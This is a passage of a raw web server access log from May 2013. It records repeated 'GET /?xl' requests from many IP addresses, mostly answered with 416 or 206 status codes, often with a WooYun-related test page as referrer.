(compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C)" 101.85.201.140 - - [24/May/2013:22:06:30 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 183.64.202.70 - - [24/May/2013:22:06:31 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 113.116.100.130 - - [24/May/2013:22:06:31 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; BTRS124342; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)" 27.155.191.254 - - [24/May/2013:22:06:31 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)" 183.157.115.3 - - [24/May/2013:22:06:32 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 182.149.204.207 - - [24/May/2013:22:06:33 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 218.5.58.196 - - [24/May/2013:22:06:34 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 49.84.154.38 - - [24/May/2013:22:06:34 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 183.64.202.70 - - [24/May/2013:22:06:34 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 49.65.10.145 - - [24/May/2013:22:06:35 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MASM; Media Center PC 6.0; Tablet PC 2.0; .NET4.0C; BRI/2)" 183.156.53.206 - - [24/May/2013:22:06:35 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 219.159.107.138 - - [24/May/2013:22:06:36 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" 222.240.152.232 - - [24/May/2013:22:06:36 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 183.64.202.70 - - [24/May/2013:22:06:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 183.64.202.70 - - [24/May/2013:22:06:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 182.149.204.207 - - [24/May/2013:22:06:37 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 183.64.202.70 - - [24/May/2013:22:06:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 180.159.38.52 - - [24/May/2013:22:06:38 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)" 113.121.71.143 - - [24/May/2013:22:06:38 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 101.85.201.140 - - [24/May/2013:22:06:39 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 1.48.225.6 - - [24/May/2013:22:06:39 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; MDDC)" 183.64.202.70 - - [24/May/2013:22:06:40 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 183.64.202.70 - - [24/May/2013:22:06:41 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 116.17.198.91 - - [24/May/2013:22:06:41 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)" 183.157.115.3 - - [24/May/2013:22:06:41 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 183.158.111.62 - - [24/May/2013:22:06:42 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; KB974488)" 112.102.189.170 - - [24/May/2013:22:06:42 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 58.19.214.162 - - [24/May/2013:22:06:43 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 180.136.11.157 - - [24/May/2013:22:06:43 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; KB974489)" 111.172.197.39 - - [24/May/2013:22:06:44 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 115.227.237.29 - - [24/May/2013:22:06:45 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 115.227.237.29 - - [24/May/2013:22:06:46 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 115.227.237.29 - - [24/May/2013:22:06:46 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 111.172.197.39 - - [24/May/2013:22:06:46 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 183.156.53.206 - - [24/May/2013:22:06:47 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 115.227.237.29 - - [24/May/2013:22:06:47 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 115.227.237.29 - - [24/May/2013:22:06:47 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 115.227.237.29 - - [24/May/2013:22:06:48 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 115.227.237.29 - - [24/May/2013:22:06:48 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 61.185.214.234 - - [24/May/2013:22:06:49 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 49.84.154.38 - - [24/May/2013:22:06:49 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 113.69.224.119 - - [24/May/2013:22:06:50 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 125.107.7.208 - - [24/May/2013:22:06:51 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 111.172.197.39 - - [24/May/2013:22:06:52 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 112.66.164.218 - - [24/May/2013:22:06:53 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 125.121.189.58 - - [24/May/2013:22:06:55 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )" 121.204.255.133 - - [24/May/2013:22:06:56 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 218.79.60.165 - - [24/May/2013:22:06:56 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 58.19.214.162 - - [24/May/2013:22:06:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 183.156.53.206 - - [24/May/2013:22:06:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 222.188.132.105 - - [24/May/2013:22:06:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C)" 27.18.230.64 - - [24/May/2013:22:06:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)" 125.75.132.64 - - [24/May/2013:22:07:00 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 60.172.205.60 - - [24/May/2013:22:07:02 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; qdesk 2.4.1263.203)" 183.156.53.206 - - [24/May/2013:22:07:02 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 61.136.178.10 - - [24/May/2013:22:07:02 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.5)" 218.82.118.150 - - [24/May/2013:22:07:03 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MALC; InfoPath.2; .NET4.0C; BRI/2; youxihe.1640; youxihe.1640)" 110.90.222.148 - - [24/May/2013:22:07:04 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; Shuame)" 110.177.232.203 - - [24/May/2013:22:07:04 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)" 58.33.94.213 - - [24/May/2013:22:07:05 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; KB974489)" 171.217.31.86 - - [24/May/2013:22:07:05 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)" 49.84.154.38 - - [24/May/2013:22:07:25 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 1.198.94.56 - - [24/May/2013:22:07:25 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MDDCJS)" 111.172.197.39 - - [24/May/2013:22:07:25 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 111.161.96.237 - - [24/May/2013:22:07:26 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 110.191.178.116 - - [24/May/2013:22:07:26 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 9.0; qdesk 2.4.1263.203; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)" 125.116.14.79 - - [24/May/2013:22:07:27 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" 183.156.53.206 - - [24/May/2013:22:07:28 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 115.152.100.157 - - [24/May/2013:22:07:30 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)" 58.19.214.162 - - [24/May/2013:22:07:32 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 121.33.190.176 - - [24/May/2013:22:07:33 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)" 58.38.244.43 - - [24/May/2013:22:07:33 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; HPNTDF; Tablet PC 2.0; Media Center PC 6.0; .NET4.0C)" 123.182.10.252 - - [24/May/2013:22:07:34 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MALN; .NET4.0C)" 42.91.206.8 - - [24/May/2013:22:07:34 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 140.255.89.46 - - [24/May/2013:22:07:35 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" 49.84.154.38 - - [24/May/2013:22:07:36 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 117.94.89.30 - - [24/May/2013:22:07:36 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB7.2; QQDownload 718; .NET CLR 2.0.50727)" 222.30.77.7 - - [24/May/2013:22:07:36 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; MALCJS)" 123.52.144.23 - - [24/May/2013:22:07:36 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 718; .NET4.0C; .NET CLR 2.0.50727)" 61.178.55.28 - - [24/May/2013:22:07:37 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)" 61.171.115.42 - - [24/May/2013:22:07:38 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 183.156.53.206 - - [24/May/2013:22:07:38 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 183.31.213.50 - - [24/May/2013:22:07:39 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; 4399Box.720; 4399Box.720)" 124.236.204.239 - - [24/May/2013:22:07:39 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; 4399Box.778; 4399Box.778; KB974489)" 222.216.57.80 - - [24/May/2013:22:07:39 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)" 1.87.220.193 - - [24/May/2013:22:07:40 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 124.239.121.99 - - [24/May/2013:22:07:41 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; InfoPath.2)" 61.171.115.42 - - [24/May/2013:22:07:42 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 183.156.53.206 - - [24/May/2013:22:07:43 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 1.192.93.13 - - [24/May/2013:22:07:44 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C)" 120.37.190.181 - - [24/May/2013:22:07:44 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 218.79.60.165 - - [24/May/2013:22:07:44 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 119.135.133.29 - - [24/May/2013:22:07:44 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MATP; .NET4.0C)" 58.19.214.162 - - [24/May/2013:22:07:46 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 61.131.97.40 - - [24/May/2013:22:07:46 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MATP; Media Center PC 6.0)" 58.214.3.98 - - [24/May/2013:22:07:46 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 113.65.12.212 - - [24/May/2013:22:07:47 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 183.156.53.206 - - [24/May/2013:22:07:51 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 61.178.69.249 - - [24/May/2013:22:07:53 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C)" 183.156.53.206 - - [24/May/2013:22:07:56 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 111.172.197.39 - - [24/May/2013:22:07:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 14.220.49.91 - - [24/May/2013:22:07:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; KB974489)" 122.194.216.252 - - [24/May/2013:22:08:02 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" 219.131.216.181 - - [24/May/2013:22:08:03 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 218.79.60.165 - - [24/May/2013:22:08:04 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 59.173.203.247 - - [24/May/2013:22:08:05 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 183.156.53.206 - - [24/May/2013:22:08:05 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 115.151.178.14 - - [24/May/2013:22:08:06 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 111.172.197.39 - - [24/May/2013:22:08:06 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 183.156.53.206 - - [24/May/2013:22:08:09 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 61.166.173.50 - - [24/May/2013:22:08:10 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 118.113.201.143 - - [24/May/2013:22:08:10 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)" 117.82.100.71 - - [24/May/2013:22:08:10 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.2; BRI/2)" 115.216.150.146 - - [24/May/2013:22:08:11 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 116.209.229.81 - - [24/May/2013:22:08:12 +0800] "GET /?xl HTTP/1.1" 416 206 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11)" 111.172.197.39 - - [24/May/2013:22:08:12 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 114.83.213.177 - - [24/May/2013:22:08:13 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MDDC; .NET4.0C)" 183.156.53.206 - - [24/May/2013:22:08:14 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 59.34.36.61 - - [24/May/2013:22:08:14 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)" 111.172.197.39 - - [24/May/2013:22:08:16 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 117.92.169.209 - - [24/May/2013:22:08:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C)" 218.79.60.165 - - [24/May/2013:22:08:20 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 114.83.89.180 - - [24/May/2013:22:08:21 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; 